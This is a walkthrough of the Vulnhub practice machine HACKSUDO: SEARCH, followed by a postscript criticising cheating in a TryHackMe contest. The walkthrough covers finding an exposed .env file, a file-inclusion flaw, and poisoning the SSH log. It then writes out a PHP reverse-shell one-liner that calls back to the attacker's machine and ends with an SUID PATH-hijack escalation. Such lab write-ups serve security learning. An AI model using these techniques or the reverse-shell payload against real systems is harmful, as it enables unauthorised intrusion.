Vulnhub: HACKSUDO: SEARCH
HACKSUDO: SEARCH
This is HACKSUDO: SEARCH from Vulnhub. It says:
This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/7ujQrt393b)
Ports
SSH and HTTP only.
Web
The basic dirsearch:
python3 /opt/dirsearch/dirsearch.py -u http://192.168.1.209
gives me a few things, including this:
[06:23:34] 200 - 306B - /.env
And in there are some creds and other stuff:
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_USERNAME=hiraman
DB_PASSWORD=MyD4dSuperH3r0!
Note we didn’t have an open SQL port though. We need a bigger feroxbuster search:
feroxbuster -u http://192.168.1.209 -w /usr/share/seclists/Discovery/Web-Content/big.txt -C 403 -x php,txt
to find this:
200 137l 288w 2918c http://192.168.1.209/search1.php
Which is what we want. Here, we find this hilarious link:
http://192.168.1.209/search1.php?FUZZ=contact.php
Along with the comment:
find me @hacksudo.com/contact @fuzzing always best option
Well, we better do what the man says. I use Burp Suite Turbo Intruder with /usr/share/seclists/Discovery/Web-Content/common.txt, and find the parameter we want is me
LFI
So we have LFI at http://192.168.1.209/search1.php?me=/etc/passwd
A bit of enumeration reveals we cannot read the apache logs, but we can read /var/log/auth.log so we poison SSH:
And then I think I used the PHP one liner for a shell. I tried a few before one worked; I think this one did:
/search1.php?me=/var/log/auth.log&cmd=php+-r+'$sock%3dfsockopen("192.168.1.208",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b'
Privesc
Remember that password from before? Yeah.
I knew we’d get there eventually. Now what?
So it’s an SUID binary, calling ‘install’ without a path. Create our own, export PATH and call the binary; no problem.
Postscript
I’ve been banging up against Year of the Jellyfish at THM and I just want to say a few words about it. It’s described thus:
This box is part of an OSCP voucher giveaway (prize kindly donated by @q8fawazo)! Root the box before 6PM UTC on the 30th of April 2021 to be entered into the prize draw. The winner will be chosen by raffle at that time, streamed and announced in the TryHackMe Discord server, so please make sure to join and verify if you wish to be entered in the competition. If you do not want to be entered, or are ineligible to use the voucher (under 18 years old, or already OSCP certified / have access to the PEN-200 (PWK) Materials), please ping @MuirlandOracle in the help channel for this room on the Discord to discuss this. There are also 5 One Month TryHackMe Subscription Vouchers to be given away in the same fashion (courtesy of @Virtual_Lad)
It goes without saying that any signs of cheating will result in an immediate and permanent ban – both from the competition and from the site/community.
I’ve got a shell and the first of two flags, but I haven’t rooted it (yet). I don’t consider myself ready for OSCP and I don’t want the voucher, but it’s a tasty challenge to try to complete anyway.
But I’ve been following the conversation in the discord about it, and apparently people are now cheating, so someone has figured it out and has told others how to do it. Foothold is easy once you’ve figured out how, but I don’t know what root is although I gather it’s unusual; I haven’t been able to figure it out yet. But let’s say you cheat and:
- get away with it, and
- win the voucher
Now what? Surely if you have to cheat to solve this thing then OSCP will crush you. And if you’re so lazy that you’ve got the skills to solve the challenge but can’t be bothered, WTF? I honestly don’t understand. Anyway I got sick of it so I went and did this Vulnhub box instead.